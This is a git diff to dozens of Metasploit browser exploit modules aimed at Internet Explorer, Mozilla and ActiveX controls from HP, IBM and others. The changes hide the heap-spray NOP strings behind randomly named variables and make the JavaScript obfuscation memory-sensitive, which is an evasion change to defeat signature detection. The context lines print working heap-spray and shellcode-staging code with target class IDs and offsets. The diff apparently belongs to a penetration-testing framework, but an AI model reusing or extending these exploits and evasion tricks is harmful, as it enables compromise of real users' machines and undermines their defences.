       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -168,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
index 104db59b37..0c72792605 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -111,6 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -140,7 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -159,7 +161,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -177,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb
index 07508e7cc5..bd4e7f4dda 100644
--- a/modules/exploits/windows/browser/hpmqc_progcolor.rb
+++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb
@@ -80,13 +80,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:98C53984-8BF8-4D11-9B1C-C324FCA9CADE' id='#{mqcontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
index f89d0476ee..cb0fd44a52 100644
--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -130,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -152,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
index 3e8f5f55b1..67d561a3f0 100644
--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -181,11 +181,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target, cli)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x90"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});
@@ -205,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
+      js_spray.obfuscate(memory_sensitive: true)
     end
 
     bof = rand_text_alpha(my_target['Offset'])
diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
index 8609745870..b0f2169981 100644
--- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
+++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
index 26a975b20a..d7fdcce77a 100644
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -80,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
 
     # Build out the message
@@ -89,7 +90,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:3BFFE033-BF43-11D5-A271-00A024A51325' id='#{inotes6}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index c106ac0cf2..e9db1c11a7 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -162,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -189,7 +190,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -211,10 +213,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{t['Offset']});
@@ -248,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js = heaplib(js, {:noobfu => true})
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = %Q|
diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
index 1b34a8d3c6..975d18bdff 100644
--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -127,6 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Payload in JS format
     code = Rex::Text.to_unescape(code)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     sploit << [0x41414141].pack("V") # Filler
     sploit << [0x42424242].pack("V") # Filler
@@ -139,7 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x2000) nops += nops;
     var offset = nops.substring(0, 0x800-0x20);
@@ -166,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = "<html>"
diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
index dfa0e379c3..2524f075d0 100644
--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -112,6 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -141,7 +142,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -160,7 +162,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -178,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
index 7043e3b9c6..b1092f5733 100644
--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -117,6 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -146,7 +147,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -165,7 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -183,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb
index 81f047a3b8..82b2350e72 100644
--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -121,12 +121,16 @@ class MetasploitModule < Msf::Exploit::Remote
     obj_name  = rand_text_alpha(rand(100) + 1)
     main_sym  = 'main' #main function name
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
 
       js = <<-EOS
       function heapspray(){
         shellcode = unescape('#{sc}');
-        bigblock = unescape("%u0c0c%u0c0c");
+        #{randnop} = "#{js_nops};
+        bigblock = unescape(#{randnop});
         headersize = 20;
         slackspace = headersize+shellcode.length;
         while (bigblock.length<slackspace){ bigblock+=bigblock; }
@@ -219,7 +223,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #JS obfuscation on demand only for IE8
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
         main_sym = js.sym('main')
       end
 
diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb
index afaa0ed651..fb3e7a9379 100644
--- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb
+++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb
@@ -72,6 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content =
@@ -79,7 +80,8 @@ class MetasploitModule < Msf::Exploit::Remote
       "<object classid='clsid:DEF37997-D9C9-4A4B-BF3C-88F99EACEEC2' id='#{vname}'></object>\n" +
       "<script language='javascript'>\n" +
       "#{rand1} = unescape('#{shellcode}');\n" +
-      "#{rand2} = unescape('#{nops}');\n" +
+      "#{randnop} = '#{nops}';\n" +
+      "#{rand2} = unescape(#{randnop});\n" +
       "#{rand3} = 20;\n" +
       "#{rand4} = #{rand3}+#{rand1}.length\n" +
       "while (#{rand2}.length<#{rand4}) #{rand2}+=#{rand2};\n" +
diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb
index 419d158867..92f6b5be20 100644
--- a/modules/exploits/windows/browser/lpviewer_url.rb
+++ b/modules/exploits/windows/browser/lpviewer_url.rb
@@ -82,7 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
     try {
       var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
index f93e14b3c3..6eb1fa5c85 100644
--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     JS
 
     js = ::Rex::Exploitation::JSObfu.new(js)
-    js.obfuscate
+    js.obfuscate(memory_sensitive: true)
 
     html = <<-EOS
     <html>
diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
index 2551db4601..51da6bf04d 100644
--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -266,7 +266,7 @@ else {
           }
         }
 
-        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate()
+        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate(memory_sensitive: true)
       end
 
     return <<-EOS
diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb
index f92acefe8c..3aa2268f40 100644
--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -144,6 +144,9 @@ class MetasploitModule < Msf::Exploit::Remote
     js_applet = rand_text_alpha(rand(10) + 5)
     a_trigger = rand_text_alpha(rand(10) + 5)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     if my_target.name =~ /\(JAVA\)/
 
       #mona.py tekniq! + Payload
@@ -197,13 +200,14 @@ class MetasploitModule < Msf::Exploit::Remote
         var nullt    = 0x2/2;
 
         var espoffset  = (7340 /2) - ptrs.length;
-        var esppadding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var esppadding = unescape(#{randnop});
         while(esppadding.length < espoffset) esppadding += esppadding;
         esppadding = esppadding.substring(0, espoffset);
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + esppadding + payload + tr_padding;
@@ -227,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       html = <<-HTML
@@ -290,7 +294,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
         var payload = unescape("#{js_payload}");
 
-        var tr_padding = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var tr_padding = unescape(#{randnop});
         while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
 
         var dummy = ptrs + payload + tr_padding;
@@ -312,7 +317,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       js = js.gsub(/^ {4}/, '')
diff --git a/modules/exploits/windows/browser/ms05_054_onload.rb b/modules/exploits/windows/browser/ms05_054_onload.rb
index 51f3c75a0b..462aac11a5 100644
--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -90,12 +90,14 @@ class MetasploitModule < Msf::Exploit::Remote
     mytarget   = auto_target(cli, request)
     var_title  = rand_text_alpha(rand(100) + 1)
     func_main  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
   shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-  var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
+  var #{randnop} = "#{Rex::Text.to_unescape(make_nops(4))}";
+  var bigblock = unescape(#{randnop});
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length < slackspace) bigblock += bigblock;
@@ -116,7 +118,7 @@ function heapspray()
   prompt(fillmem, "");
 }
 |
-    heapspray.obfuscate
+    heapspray.obfuscate(memory_sensitive: true)
 
     nofunc = ::Rex::Exploitation::JSObfu.new %Q|
 
@@ -150,7 +152,7 @@ else
 }
 |
 
-    nofunc.obfuscate
+    nofunc.obfuscate(memory_sensitive: true)
 
     main = %Q|
 function #{func_main}()
diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
index 98d1d0c40f..7616022343 100644
--- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb
+++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb
@@ -89,13 +89,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rnd              = rand(2)
     var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
     var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
+    randnop          = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <head>
 <script language = "javascript">
 var #{var_payload} = unescape("#{shellcode}");
-var #{var_nopslide} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{var_nopslide} = unescape(#{randnop});
 var #{var_slidesize} = 20+#{var_payload}.length;
 while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
 var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});
diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
index 6d42df9e22..7665640539 100644
--- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
+++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb
@@ -75,13 +75,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
index 9e66fbb07d..7c0e9dc7fa 100644
--- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
+++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
@@ -81,6 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10  = rand_text_alpha(rand(100) + 1)
     rand11  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
 <html>
@@ -91,7 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
   for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
   var #{rand4} = unescape("#{shellcode}");
   var #{rand5} = (#{rand4}.length * 2);
-  var #{rand6} = unescape("#{nops}");
+  var #{randnop} = "#{nops}";
+  var #{rand6} = unescape(#{randnop});
   var #{rand7} = 0x0c0c0c0c;
   var #{rand8} = 0x100000;
   var #{rand9} = #{rand8} - (#{rand5} + 1);
diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
index 5178418299..b08c0668c1 100644
--- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
@@ -146,7 +146,7 @@ history.go(0);
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 #<body onload="history.go(0); #{fnname}()">
 
     # Build the final HTML
diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb
index c8b5ccef49..2966c17471 100644
--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -118,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # The exploit will try to take up the freed memory
     # with a fake item before the reuse
@@ -196,7 +197,8 @@ function Start() {
 
   var code = unescape("#{js_code}");
   var memory_layout = unescape("#{memory_layout_js}")
-  var nops = unescape("#{js_nops}");
+  var #{randnop} = "#{js_nops}";
+  var nops = unescape(#{randnop});
   while (nops.length < 0x80000) nops += nops;
   var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length);
   var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length);
diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
index 4057063f2c..9908cfbf81 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -176,7 +176,7 @@ function heapspray(){
   }
 }
     |
-    heapspray.obfuscate
+    heapspray.obfuscate(memory_sensitive: true)
 
     # Construct the final page
     case mytarget['Method']
diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
index 6551fe2303..913d388581 100644
--- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
@@ -187,7 +187,7 @@ EOS
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    #js.obfuscate()
+    #js.obfuscate(memory_sensitive: true)
 
     # Construct the final page
     html = <<-EOS
diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
index c748ace556..4139e9d4ef 100644
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -189,6 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
     code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
     vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+
     #Extract string based on what the setup is
     if mytarget.name == 'Internet Explorer 8 on XP SP3'
       js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
@@ -214,7 +217,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     function heap_spray(heaplib_obj, offset) {
       var code = unescape("#{code_js}");
-      var nops = unescape("%u0c0c%u0c0c");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
 
       while (nops.length < 0x1000) nops += nops;
       offset = nops.substring(0, #{mytarget['Offset']});
@@ -249,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-HTML
